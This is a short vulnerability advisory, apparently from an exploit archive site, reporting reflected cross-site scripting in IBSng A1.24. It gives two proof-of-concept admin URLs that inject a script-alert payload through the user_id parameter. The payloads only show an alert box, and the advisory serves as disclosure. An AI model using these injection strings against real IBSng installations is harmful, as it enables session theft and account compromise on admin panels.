IBSng Version A1.24 Cross Site Scripting Vulnerability

2013.08.06
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-79

-============== In The Name Of God ==============- # Title : IBSng Version A1.24 Cross Site Scripting Vulnerability # Author : IRaNHaCK Security Team # Tested on : 7 , Xp , Backtrack # Vendor : http://ibs.sourceforge.net/ # Date : 2013-08-05 # Our Website : WWW.IRaNHaCK.ORG <------------------------------------------> -==========<XsS>==========- 1- Http://127.0.0.1/IBSng/admin/report/realtime_web_analyzer.php?username=[Username]&user_id=<script>alert(/IRaNHaCK/)</script> 2- Http://127.0.0.1/IBSng/admin/user/change_credit.php?user_id=<script>alert(/IRaNHaCK/)</script> <------------------------------------------> Greetz : Mr.XpR - Secret.Walker - V30Sharp - FarbodEZRaeL - AL1R3Z4 - Mr.a!i - ZeroKilleR - Mr.FixXxer - @3is - mr.3lr0n - r0bb3r68 M.R.S.CO - Mr.Cicili - Navid Black Hat - FTA_boy - Mh0122 & All Of Our Friends ./MojiRider ./Persian Gulf For EVER

References:

http://ibs.sourceforge.net/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top